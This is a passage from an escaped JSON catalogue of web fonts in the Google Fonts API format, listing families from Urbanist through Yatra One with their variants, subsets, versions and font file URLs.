\"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA11eUpmvacG1K4S1.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"VT323\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/vt323/v17/pxiKyp0ihIEF2hsYHpT2dkNE.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Vampiro One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-04-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/vampiroone/v18/gokqH6DoDl5yXvJytFsdLkqnsvhIor3K.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Varela\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/varela/v16/DPEtYwqExx0AWHXJBBQFfvzDsQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Varela Round\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/varelaround/v19/w8gdH283Tvk__Lua32TysjIvoMGOD9gxZw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Varta\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/varta/v17/Qw3AZQpJHj_6LzHUngWbrFkDH1x96j4EirE-9PGLfQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/varta/v17/Qw3AZQpJHj_6LzHUngWbrFkDH1x9tD4EirE-9PGLfQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/varta/v17/Qw3AZQpJHj_6LzHUngWbrFkDH1x9hj4EirE-9PGLfQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/varta/v17/Qw3AZQpJHj_6LzHUngWbrFkDH1x9ajkEirE-9PGLfQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/varta/v17/Qw3AZQpJHj_6LzHUngWbrFkDH1x9UzkEirE-9PGLfQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Vast Shadow\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/vastshadow/v15/pe0qMImKOZ1V62ZwbVY9dfe6Kdpickwp.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Vazirmatn\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklWgyOReZ72DF_QY.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklegzOReZ72DF_QY.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklTYzOReZ72DF_QY.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklWgzOReZ72DF_QY.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklVozOReZ72DF_QY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklbY0OReZ72DF_QY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklY80OReZ72DF_QY.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRkleg0OReZ72DF_QY.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklcE0OReZ72DF_QY.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Vesper Libre\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/vesperlibre/v19/bx6CNxyWnf-uxPdXDHUD_Rd4D0-N2qIWVQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/vesperlibre/v19/bx6dNxyWnf-uxPdXDHUD_RdA-2ap0okKXKvPlw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/vesperlibre/v19/bx6dNxyWnf-uxPdXDHUD_RdAs2Cp0okKXKvPlw.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/vesperlibre/v19/bx6dNxyWnf-uxPdXDHUD_RdAi2Kp0okKXKvPlw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Viaoda Libre\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/viaodalibre/v15/vEFW2_lWCgoR6OKuRz9kcRVJb2IY2tOHXg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Vibes\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/vibes/v14/QdVYSTsmIB6tmbd3HpbsuBlh.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Vibur\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/vibur/v23/DPEiYwmEzw0QRjTpLjoJd-Xa.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Vidaloka\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/vidaloka/v18/7cHrv4c3ipenMKlEass8yn4hnCci.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Viga\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/viga/v14/xMQbuFFdSaiX_QIjD4e2OX8.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Voces\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/voces/v20/-F6_fjJyLyU8d4PBBG7YpzlJ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Volkhov\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-04-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/volkhov/v17/SlGQmQieoJcKemNeQTIOhHxzcD0.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/volkhov/v17/SlGSmQieoJcKemNecTAEgF52YD0NYw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/volkhov/v17/SlGVmQieoJcKemNeeY4hoHRYbDQUego.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/volkhov/v17/SlGXmQieoJcKemNecTA8PHFSaBYRagrQrA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Vollkorn\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/vollkorn/v21/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df2MHGuGWOdEbD63w.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/vollkorn/v21/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df2AnGuGWOdEbD63w.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/vollkorn/v21/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df27nauGWOdEbD63w.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/vollkorn/v21/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df213auGWOdEbD63w.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/vollkorn/v21/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df2sHauGWOdEbD63w.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/vollkorn/v21/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df2mXauGWOdEbD63w.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/vollkorn/v21/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DJGWmmZM7Xq34g9.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/vollkorn/v21/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DJ0WmmZM7Xq34g9.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/vollkorn/v21/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DKYXWmZM7Xq34g9.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/vollkorn/v21/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DKhXWmZM7Xq34g9.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/vollkorn/v21/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DLGXWmZM7Xq34g9.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/vollkorn/v21/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DLvXWmZM7Xq34g9.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Vollkorn SC\",\n      \"variants\": [\n        \"regular\",\n        \"600\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/vollkornsc/v11/j8_v6-zQ3rXpceZj9cqnVhF5NH-iSq_E.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/vollkornsc/v11/j8_y6-zQ3rXpceZj9cqnVimhGluqYbPN5Yjn.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/vollkornsc/v11/j8_y6-zQ3rXpceZj9cqnVinFG1uqYbPN5Yjn.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/vollkornsc/v11/j8_y6-zQ3rXpceZj9cqnVin9GVuqYbPN5Yjn.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Voltaire\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/voltaire/v15/1Pttg8PcRfSblAvGvQooYKVnBOif.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Vujahday Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/vujahdayscript/v3/RWmQoKGA8fEkrIPtSZ3_J7er2dUiDEtvAlaMKw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Waiting for the Sunrise\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/waitingforthesunrise/v16/WBL1rFvOYl9CEv2i1mO6KUW8RKWJ2zoXoz5JsYZQ9h_ZYk5J.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Wallpoet\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/wallpoet/v16/f0X10em2_8RnXVVdUNbu7cXP8L8G.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Walter Turncoat\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/walterturncoat/v19/snfys0Gs98ln43n0d-14ULoToe67YB2dQ5ZPqQ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Warnes\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/warnes/v22/pONn1hc0GsW6sW5OpiC2o6Lkqg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Water Brush\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/waterbrush/v2/AYCPpXPqc8cJWLhp4hywKHJq7PKP5Z_G.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Waterfall\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/waterfall/v3/MCoRzAfo293fACdFKcwY2rH8D_EZwA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Wellfleet\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/wellfleet/v20/nuF7D_LfQJb3VYgX6eyT42aLDhO2HA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Wendy One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-04-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/wendyone/v14/2sDcZGJOipXfgfXV5wgDb2-4C7wFZQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Whisper\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/whisper/v2/q5uHsoqtKftx74K9milCBxxdmYU.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"WindSong\",\n      \"variants\": [\n        \"regular\",\n        \"500\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/windsong/v7/KR1WBsyu-P-GFEW57r95HdG6vjH3.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/windsong/v7/KR1RBsyu-P-GFEW57oeNNPWylS3-jVXm.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Wire One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/wireone/v24/qFdH35Wah5htUhV75WGiWdrCwwcJ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Work Sans\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K0nWNigDp6_cOyA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K8nXNigDp6_cOyA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32KxfXNigDp6_cOyA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K0nXNigDp6_cOyA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K3vXNigDp6_cOyA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K5fQNigDp6_cOyA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K67QNigDp6_cOyA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K8nQNigDp6_cOyA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K-DQNigDp6_cOyA.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGU3moJo43ZKyDSQQ.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUXmsJo43ZKyDSQQ.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUgGsJo43ZKyDSQQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGU3msJo43ZKyDSQQ.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGU7GsJo43ZKyDSQQ.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUAGwJo43ZKyDSQQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUOWwJo43ZKyDSQQ.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUXmwJo43ZKyDSQQ.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUd2wJo43ZKyDSQQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Xanh Mono\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/xanhmono/v17/R70YjykVmvKCep-vWhSYmACQXzLhTg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/xanhmono/v17/R70ejykVmvKCep-vWhSomgqUfTfxTo24.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Yaldevi\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"sinhala\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/yaldevi/v8/cY9afj6VW0NMrDWtDNzCOwlPMq9SLpfxJzvobxLCBJkS.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/yaldevi/v8/cY9afj6VW0NMrDWtDNzCOwlPMq9SLpcvJzvobxLCBJkS.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/yaldevi/v8/cY9afj6VW0NMrDWtDNzCOwlPMq9SLpdxJzvobxLCBJkS.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/yaldevi/v8/cY9afj6VW0NMrDWtDNzCOwlPMq9SLpdDJzvobxLCBJkS.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/yaldevi/v8/cY9afj6VW0NMrDWtDNzCOwlPMq9SLpevIDvobxLCBJkS.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/yaldevi/v8/cY9afj6VW0NMrDWtDNzCOwlPMq9SLpeWIDvobxLCBJkS.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Yanone Kaffeesatz\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/yanonekaffeesatz/v24/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftodtWpcGuLCnXkVA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/yanonekaffeesatz/v24/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftoqNWpcGuLCnXkVA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/yanonekaffeesatz/v24/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIfto9tWpcGuLCnXkVA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/yanonekaffeesatz/v24/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftoxNWpcGuLCnXkVA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/yanonekaffeesatz/v24/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftoKNKpcGuLCnXkVA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/yanonekaffeesatz/v24/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftoEdKpcGuLCnXkVA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Yantramanav\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/yantramanav/v11/flU-Rqu5zY00QEpyWJYWN5-QXeNzDB41rZg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/yantramanav/v11/flUhRqu5zY00QEpyWJYWN59Yf8NZIhI8tIHh.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/yantramanav/v11/flU8Rqu5zY00QEpyWJYWN6f0V-dRCQ41.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/yantramanav/v11/flUhRqu5zY00QEpyWJYWN58AfsNZIhI8tIHh.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/yantramanav/v11/flUhRqu5zY00QEpyWJYWN59IeMNZIhI8tIHh.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/yantramanav/v11/flUhRqu5zY00QEpyWJYWN59wesNZIhI8tIHh.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Yatra One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      